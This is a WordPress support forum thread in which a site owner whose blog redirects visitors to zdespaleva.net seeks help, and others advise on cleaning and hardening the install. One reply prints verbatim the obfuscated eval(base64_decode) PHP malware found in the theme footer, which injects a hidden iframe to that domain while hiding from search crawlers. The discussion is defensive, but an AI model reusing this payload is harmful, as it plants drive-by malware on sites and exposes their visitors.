WordPress Hacked?

  • The blog: https://newsrealblog.com

    I am having issues on some viewers being directed to a zdespaleva.net, even when posting a new article.

    Once the site loads, I have only seen it once direct to this domain, but others are having repetitive issues. Sometimes the dashboard doesn’t load. Also many of the bloggers cannot login due to bad credentials even after resetting the password.

    The domain zdespaleva was registered recently and about the same time we started seeing issues.

    Any ideas? Where can I start to remove this?

Viewing 15 replies - 1 through 15 (of 15 total)
  • Thread Starter dashton

    (@dashton)

    The dashboard looks like it is loading without php to be more clear.

    Also viewers are being asked to install a plugin, then a smiley pop’s up with a “F U”

    Thread Starter dashton

    (@dashton)

    Also, when in the dashboard. My browser is trying to load from this domain that domain: “Waiting for https://zdespaleva.net..”

    Thread Starter dashton

    (@dashton)

    I just pulled this out of my footer:

    <?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gJzxpZnJhbWUgc3JjPSJodHRwOi8vemRlc3BhbGV2YS5uZXQvaW4ucGhwP3Y9YXJiYWl0ZW4iIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgaWQ9InpsIj48L2lmcmFtZT4nOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gbXJvYmgoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qil7ICAgICBIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTsgICAgICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7ICAgICAgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSkpeyAgICAgIHJldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxcL2JvZHlbXlw+XSpcPikvc2knLGdtbCgpLiJcbiIuJyQxJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKTsgICAgIH1lbHNleyAgICAgIHJldHVybiAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpOyAgICAgfSAgICB9ICAgIG9iX3N0YXJ0KCdtcm9iaCcpOyAgIH0gIH0=”));?>

    yeah…yer hacksd.

    Check around any files on you server that end in a php extension.

    There’s a chance some, or all of them have that stuff in them

    https://codex.www.ads-software.com/FAQ_My_site_was_hacked
    then read this, and get busy

    It takes quite a bit to clean a hacked WP install, especially if the hack bled over into other software and stuff on your server

    Thread Starter dashton

    (@dashton)

    Thanks for the reply and link. I found it in every php file on the theme. I pretty much got it cleared up but your right, it’s all over the dashboard so I need to check all of the files. I will be switching to a clean install of wordpress and will do a manual transfer and check every file individually.

    yeah…that hack sucks. Make sure you follow all the advice given in that link, and the links from that page

    once you clean everything up, you’ve gotta make sure it doesn’t happen again by hardening your install

    Also, if you have other software installed on your host, check around…I had every php file on my whole server infected

    and finally, when you do a fresh install, it will clean up all wp files. you’ll have to manually clean your theme, or reinstall. Then you will have to reinstall all plugins as those probably got infected. And finally, you will most likely need to clean your wp-config.php file, as that doesn’t get replaced by a reinstall.

    Good Luck

    Thread Starter dashton

    (@dashton)

    When you were infected do you know if its just the base64_decode php line that needs to be removed or is there an additional handler in the code?

    It happened to me twice. Once I was able to look at my access logs based on the timestamp of when my files were changed. That led to 2 rogue php files named things like wp-settings.php that were in a product folder in a shop I ran, and in the 11/2008 uploads folder of a different WP install.

    Those files were allowing things to be inserted into other files.

    The second time, I had a bizarely named file in my WP root that was allowing the access

    So basically I had to get rid of all the base64 stuff, and the rogue php files

    Thread Starter dashton

    (@dashton)

    Thanks again Voodoo.

    For Sure

    can this infect my laptop with a virus because i went on farmvillefreak.com and was sent to zdespaleva.net…or is it just something that affects wordpress sites? can this crash my computer?

    I’m pretty sure your computer is safe with this particular issue. You run an antivirus I assume?

    yes i did,but it came up with a pop up…saying windows intenet explorer…fck you! and im just a little bit worried

    Thread Starter dashton

    (@dashton)

    Not sure if you’re still around Dart, but you weren’t accessing the site I mentioned prior were you? Could it be that the server was hit, and it’s spreading to multiple sites?

    Is that even possible? I thought on a shared hosting account each website directory was separate from each other?

    well it was a blog…so im not sure i only joined wordpress to comment on here because i wanted to know that my laptop was safe…since…i dont know what it was since im no computer genius

Viewing 15 replies - 1 through 15 (of 15 total)
  • The topic ‘WordPress Hacked?’ is closed to new replies.